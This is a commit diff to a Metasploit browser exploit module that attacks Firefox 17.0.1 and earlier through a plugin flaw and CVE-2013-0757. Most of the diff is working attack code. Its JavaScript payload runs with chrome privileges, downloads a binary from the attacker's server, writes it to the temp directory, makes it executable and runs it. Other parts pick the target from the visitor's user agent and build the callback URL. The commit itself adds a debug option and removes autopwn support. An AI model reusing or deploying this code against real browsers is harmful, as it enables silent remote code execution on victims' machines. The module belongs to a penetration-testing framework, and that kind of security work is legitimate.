Add DEBUG option, pass args to .encoded_exe().

jvennix-r7 · jvennix-r7 · commit 978aafcb1607 · 2013-05-21T14:01:14.000-05:00
diff --git a/modules/exploits/multi/browser/firefox_svg_plugin.rb b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@@ -10,22 +10,8 @@
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
-	#
-	# This module acts as an HTTP server
-	#
 	include Msf::Exploit::Remote::HttpServer::HTML
 	include Msf::Exploit::EXE
-	include Msf::Exploit::Remote::BrowserAutopwn
-
-	autopwn_info({
-		:ua_name => HttpClients::FF,
-		:ua_maxver => '17.0.1',
-		:javascript => true,
-		:rank => ExcellentRanking, # 100% reliable cmd exec
-		:vuln_test => %Q{
-			is_vuln = !!navigator.mimeTypes["application/x-shockwave-flash"];
-		}
-	})
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -40,32 +26,24 @@ def initialize(info = {})
 				
 				Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper
 				around the child frame's window reference and inject code into the chrome://
-				context.
-
-				Once we have injection into the chrome execution context, we can write our
-				payload to disk, chmod it (if posix), and then execute.
+				context. Once we have injection into the chrome execution context, we can write
+				the payload to disk, chmod it (if posix), and then execute.
 				
 				Note: Flash is used here to trigger the exploit but any Firefox plugin
 				with script access should be able to trigger it.
 			},
 			'License'        => MSF_LICENSE,
 			'Targets'        => [ 
-				['Automatic',
-					{
-						'Platform' => ['win', 'osx', 'linux'],
-						'Arch'     => ARCH_X86
-					}
-				],
 				[ 'Windows x86 (Native Payload)',
 					{
 						'Platform' => 'win',
-						'Arch' => ARCH_X86,
+						'Arch' => ARCH_X86
 					}
 				],
 				[ 'Linux x86 (Native Payload)',
 					{
 						'Platform' => 'linux',
-						'Arch' => ARCH_X86,
+						'Arch' => ARCH_X86
 					}
 				],
 				[ 'Mac OS X x86 (Native Payload)',
@@ -80,7 +58,6 @@ def initialize(info = {})
 				[
 					'Marius Mlynski', # discovery & bug report
 					'joev'            # metasploit module
-					
 				],
 			'References'     =>
 				[
@@ -94,15 +71,14 @@ def initialize(info = {})
 
 		register_options(
 			[
-				OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
+				OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] ),
+				OptBool.new('DEBUG', [false, "Display some alert()'s for debugging the payload.", false])
 			], Auxiliary::Timed)
 
 	end
 
 	def on_request_uri(cli, request)
-		my_target = get_target(request.headers['User-Agent'])
-
-		if my_target.nil?
+		if target != get_target(request.headers['User-Agent'])
 			print_status("User agent does not match an available payload type, bailing.")
 			send_not_found(cli)
 			return
@@ -115,7 +91,7 @@ def on_request_uri(cli, request)
 		elsif request.uri =~ /\.bin/
 			# send the binary payload to drop & exec
 			print_status("Child frame navigated. Sending binary payload to drop & execute.")
-			send_response(cli, dropped_file_contents(cli, my_target), { 'Content-Type' => 'application/octet-stream' })
+			send_response(cli, dropped_file_contents(cli), { 'Content-Type' => 'application/octet-stream' })
 		else
 			# send initial HTML page
 			print_status("Sending #{self.name}")
@@ -124,29 +100,27 @@ def on_request_uri(cli, request)
 		handler(cli)
 	end
 
-	def dropped_file_contents(cli, my_target)
-		p = regenerate_payload(cli, my_target.arch, my_target.platform, my_target).encoded_exe
-		puts "PAYLOAD"
-		puts my_target.name
-		puts my_target.platform.names
-		puts my_target.arch
-		puts my_target == target
-		p
+	def dropped_file_contents(cli)
+		regenerate_payload(cli).encoded_exe()
 	end
 
 	def get_target(agent)
-		return target if target.name != 'Automatic'
+		# browser detection
+		if agent !~ /firefox/i
+			return nil
+		end
+		# os detection
 		if agent =~ /windows/i
 			print_status 'Windows detected.'
-			return targets[1]
+			targets[0]
 		elsif agent =~ /linux/i
 			print_status 'Linux detected.'
-			return targets[2]
+			targets[1]
 		elsif agent =~ /macintosh/i and agent =~ /intel/i
 			print_status 'OSX detected.'
-			return targets[3]
+			targets[2]
 		else
-			return target
+			nil
 		end
 	end
 
@@ -164,14 +138,13 @@ def payload_filename
 	end
 
 	def js_payload
-		#'alert(Components.stack)'
 		%Q|
-		alert(1)
+		#{js_debug("Injection successful. JS executing with chrome privileges.")}
 		var x = new XMLHttpRequest;
 		x.overrideMimeType('text/plain; charset=x-user-defined');  
 		x.open('POST', '#{base_url}.bin', false);
 		x.send(null);
-		alert(x.responseText);
+		#{js_debug("'Payload: '+x.responseText", "")}
 		var file = Components.classes["@mozilla.org/file/directory_service;1"]
 		  .getService(Components.interfaces.nsIProperties)
 		  .get("TmpD", Components.interfaces.nsIFile);
@@ -186,14 +159,18 @@ def js_payload
 			stream.close();
 		}
 		#{chmod_code}
-		alert(file.path);
+		#{js_debug("'Downloaded to: '+file.path", "")}
 		var process = Components.classes["@mozilla.org/process/util;1"]
 		                .createInstance(Components.interfaces.nsIProcess);
 		process.init(file);
-		process.run(false,[],0);
+		process.run(false, [], 0);
 		|
 	end
 
+	def js_debug(str, quote="'")
+		if datastore['DEBUG'] then "alert(#{quote}#{str}#{quote})" else '' end
+	end
+
 	def chmod_code
 		return '' if target.name == 'Windows x86 (Native Payload)'
 		%Q|
@@ -208,7 +185,8 @@ def chmod_code
 	# @return [String] URL for sending requests back to the module
 	def base_url
 		proto = (datastore["SSL"] ? "https" : "http")
-		"#{proto}://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
+		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+		"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
 	end
 
 	def generate_html
